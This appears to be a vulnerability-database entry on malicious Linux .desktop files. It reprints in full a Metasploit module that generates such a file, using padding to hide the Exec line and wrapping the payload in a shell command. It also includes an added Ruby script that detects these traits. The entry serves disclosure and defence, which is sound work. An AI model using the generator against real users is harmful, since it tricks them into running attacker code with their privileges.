Malicious XDG Desktop File

Vulnerability information

Vulnerability name: Malicious XDG Desktop File

Vulnerability type: File upload (a malicious file delivered to and opened by the user; ATT&CK T1204.002, User Execution: Malicious File)

Severity: High

Description: This entry covers the creation and use of a malicious XDG desktop (.desktop) file. On most modern systems desktop files are not trusted by default: the user receives a warning that the file is untrusted when running it, but may choose to run it anyway. The default file manager in some desktop environments imposes stricter requirements, prompting the user to mark the file as executable and/or as trusted before it will run.

Affected products: XDG desktop entry files follow the freedesktop.org Desktop Entry Specification, used on Linux, Unix, Solaris and FreeBSD to define how an application is launched together with its name, icon and similar metadata. The format is supported by desktop environments such as GNOME and KDE and is a core part of application integration on these systems.

Explanation: This is a file-delivery (file upload) vector. The attacker crafts a .desktop file whose Exec key names the command to run and lures the victim into opening it, which executes that command with the victim's privileges. The technical root is the desktop-entry launch mechanism itself: Exec may specify any command, and the safeguards are limited to a trust warning (and, in some file managers, an executable/trusted requirement) that the user can satisfy or dismiss.

Impact analysis: The severity is high because once the user runs the malicious .desktop file, the attacker's command executes on the victim's system, which can lead to remote code execution through the delivered payload, data theft or disruption of service. Most modern systems warn that the file is untrusted, but users who lack security awareness may ignore the warning. File managers that require extra steps (marking the file executable or trusted) raise the bar somewhat but do not prevent the attack.

Product name: XDG Desktop

Source: https://github.com/rapid7/metasploit-framework/blob/5fd61844944459bee5ba99996ee4dec0ce52b092/modules%2Fexploits%2Fmulti%2Ffileformat%2Fxdg_desktop.rb

Type: rapid7/metasploit-framework: GitHub commit

PoC details

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Malicious XDG Desktop File',
        'Description' => %q{
          This module creates a malicious XDG Desktop (.desktop) file.

          On most modern systems, desktop files are not trusted by default.
          The user will receive a warning prompt that the file is not trusted
          when running the file, but may choose to run the file anyway.

          The default file manager applications in some desktop environments
          may impose more strict execution requirements by prompting the user
          to set the file as executable and/or marking the file as trusted
          before the file can be executed.
        },
        'Author' => [
          'bcoles'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/'],
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/exec-variables.html'],
          ['URL', 'https://wiki.archlinux.org/title/Desktop_entries']
        ],
        'Platform' => %w[linux unix solaris freebsd],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'DefaultTarget' => 0,
        'Privileged' => false,
        'DisclosureDate' => '2007-02-06',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [SCREEN_EFFECTS]
        }
      )
    )

    register_options([
      OptString.new('FILENAME', [true, 'The desktop file name.', 'msf.desktop']),
      OptString.new('APPLICATION_NAME', [false, 'The application name. Some file managers will display this name instead of the file name. (default is random)', '']),
    ])

    register_advanced_options([
      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the payload.', 100]),
    ])
  end

  def application_name
    datastore['APPLICATION_NAME'].blank? ? rand_text_alpha(6..12) : datastore['APPLICATION_NAME']
  end

  def exploit
    # Keys are emitted in random order so the generated file has no fixed layout.
    values = [
      'Type=Application',
      "Name=#{application_name}",
      # 'Hidden=true', # This property is not supported by old systems, which prevents execution
      'NoDisplay=true',
      'Terminal=false'
    ]
    desktop = "[Desktop Entry]\n"
    desktop << values.shuffle.join("\n")
    desktop << "\n"
    # Padding pushes the Exec line far below the visible keys when the file is opened in an editor.
    desktop << "\n" * datastore['PrependNewLines']

    # The payload is placed inside a double-quoted Exec argument, so backslashes and
    # double quotes are escaped as the Desktop Entry Specification requires.
    escaped_payload = payload.encoded.gsub('\\', '\\\\\\').gsub('"', '\\"')
    desktop << "Exec=/bin/sh -c \"#{escaped_payload}\""

    file_create(desktop)
  end
end
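As an added example (not part of the Metasploit module above or of the desktop-entry spec), the following Ruby script shows what a defender or triage analyst would check on a suspicious .desktop file: it parses the file as groups of key=value entries, splits the Exec value using the quoting rules from the exec-variables page the module references, mirrors the module's backslash/double-quote escaping so the round trip can be verified, and flags the three traits the module's output combines: an Exec wrapped in `/bin/sh -c`, NoDisplay=true, and a long run of blank lines before Exec. The sample entries, the `SHELLS` list and the finding tags are constructed for this demo.

```ruby
# Added example, not the Metasploit module's code: parse a .desktop file,
# split its Exec value with the spec's quoting rules, and flag the traits the
# module's output combines. All sample entries below are constructed.

# Parse desktop-entry text into { group => { key => value } }.
# Blank lines and '#' comment lines are ignored; keys before any group are dropped.
def parse_desktop(text)
  groups = {}
  current = nil
  text.each_line do |raw|
    line = raw.chomp
    next if line.strip.empty? || line.lstrip.start_with?('#')
    if (g = line.match(/\A\[([^\]]+)\]\s*\z/))
      current = (groups[g[1]] ||= {})
    elsif current && (kv = line.match(/\A([A-Za-z0-9-]+(?:\[[^\]]*\])?)\s*=\s*(.*)\z/))
      current[kv[1]] = kv[2]
    end
  end
  groups
end

# Split an Exec value into argv per the spec: arguments are space-separated, a
# double-quoted argument may contain spaces, and inside quotes a backslash
# escapes the next character. An unescaped $ or backtick inside quotes stays
# literal (as GLib's g_shell_parse_argv also does), so /bin/sh -c expands it.
def split_exec(value)
  argv = []
  buf = +''
  started = false
  in_quote = false
  chars = value.chars
  i = 0
  while i < chars.length
    c = chars[i]
    if in_quote && c == '\\' && i + 1 < chars.length
      buf << chars[i + 1]
      i += 1
    elsif c == '"'
      in_quote = !in_quote
      started = true
    elsif c == ' ' && !in_quote
      argv << buf if started
      buf = +''
      started = false
    else
      buf << c
      started = true
    end
    i += 1
  end
  argv << buf if started
  argv
end

# Same escaping the module applies to the payload (block form so the
# replacement strings are taken literally): \ -> \\ and " -> \".
def escape_for_exec(command)
  command.gsub('\\') { '\\\\' }.gsub('"') { '\\"' }
end

# Count the blank lines directly before the Exec= line (the module pads 100).
def blank_lines_before_exec(text)
  run = 0
  text.each_line do |raw|
    line = raw.chomp
    return run if line.start_with?('Exec=')
    run = line.strip.empty? ? run + 1 : 0
  end
  0
end

# Constructed list of shells whose "-c" form marks an inline command.
SHELLS = %w[sh bash dash zsh ksh].freeze

# Return the launcher's argv plus finding tags. NoDisplay=true alone is common
# in legitimate system entries and is only a supporting signal.
def assess_desktop(text)
  entry = parse_desktop(text)['Desktop Entry'] || {}
  argv = split_exec(entry['Exec'].to_s)
  findings = []
  if argv.length >= 3 && SHELLS.include?(File.basename(argv[0])) && argv[1] == '-c'
    findings << :inline_shell_command
  end
  findings << :hidden_from_menus if entry['NoDisplay'] == 'true'
  findings << :padded_exec if blank_lines_before_exec(text) >= 10
  { argv: argv, findings: findings }
end

# Constructed sample shaped like the module's output, with a harmless command.
MALICIOUS_DESKTOP = ['[Desktop Entry]', 'Terminal=false', 'Name=Invoice',
                     'NoDisplay=true', 'Type=Application'].join("\n") +
                    "\n" + "\n" * 100 +
                    "Exec=/bin/sh -c \"#{escape_for_exec('echo "hello" > /tmp/demo; id')}\"\n"

# Constructed benign entry for comparison.
BENIGN_DESKTOP = "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\nTerminal=false\n"

if $PROGRAM_NAME == __FILE__
  { 'benign' => BENIGN_DESKTOP, 'suspicious' => MALICIOUS_DESKTOP }.each do |label, text|
    r = assess_desktop(text)
    puts "#{label}: argv=#{r[:argv].inspect} findings=#{r[:findings].inspect}"
  end
end
```

Run it directly to print the launcher argv and findings for both samples. NoDisplay=true on its own is routine in legitimate system entries, so treat it as a supporting signal; an Exec that wraps an inline shell command, combined with padding that pushes Exec out of view, is the strong one. Because the splitter keeps an unescaped `$` literal, a payload containing shell variables still reaches `/bin/sh -c` intact, which is why the module only needs to escape backslashes and double quotes.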

http://example.com/2025/08/04/github_1576080735/
Author: lianccc
Published: 4 August 2025